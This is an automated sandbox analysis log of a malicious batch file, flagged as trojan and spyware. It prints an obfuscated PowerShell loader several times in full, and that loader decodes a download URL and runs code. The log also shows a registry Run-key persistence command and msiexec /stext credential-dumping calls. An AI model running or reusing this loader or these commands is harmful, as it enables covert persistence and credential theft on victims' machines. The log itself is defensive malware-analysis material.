                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E8B276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E8C022
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234BB5C1
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234C7194
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6076
                Source: unknown | Process created: Commandline size = 6100
                Source: amsi32_6504.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winBAT@22/13@3/3
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Knighting.Pro
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-G9FJB6
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2700:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c13zdzdo.t5y.ps1
                Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3664
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000D.00000003.2621550336.0000000004A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33236
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. ds
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecl
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
